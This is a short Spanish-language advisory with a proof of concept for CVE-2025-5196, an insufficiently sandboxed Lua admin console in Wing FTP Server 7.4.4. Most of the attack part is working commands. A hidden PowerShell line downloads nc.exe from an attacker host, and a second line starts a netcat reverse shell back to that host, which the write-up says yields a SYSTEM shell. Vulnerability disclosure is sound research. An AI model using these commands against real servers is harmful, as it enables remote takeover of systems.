
Wing FTP Server proporciona una consola de scripting administrativo Lua accesible a través de su interfaz web. Los administradores autenticados pueden ejecutar código Lua arbitrario con un sandboxing insuficiente. CVE-2025-5196
Wing FTP Server proporciona una consola administrativa de scripting Lua accesible a través de su interfaz web. Los administradores autenticados pueden ejecutar código Lua arbitrario con un sandboxing insuficiente.
Versión afectada: Wing FTP Server 7.4.4 (Windows) | Autenticación requerida: Sí
Hasta el 24 de mayo de 2025, la última versión de la aplicación proporcionada por el proveedor se puede encontrar en el siguiente enlace: https://www.wftpserver.com/download.htm
Además, se puede señalar que hasta la misma fecha hay una nota de versión publicada que informa de que la vulnerabilidad RCE ha sido corregida en la versión 7.4.4. El enlace a las notas de la versión se puede encontrar aquí: https://www.wftpserver.com/serverhistory.htm

PoC relacionado con CVE-2025-5196 VulDB

Interfaz web de Wing FTP Server


La primera parte del comando descargará nc.exe (netcat para Windows x86) en la ruta "C:\Users\usuario\Desktop\Drops". La segunda parte ejecutará nc.exe 192.168.234.131 4443 -e cme.exe.
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

Shell NT/SYSTEM
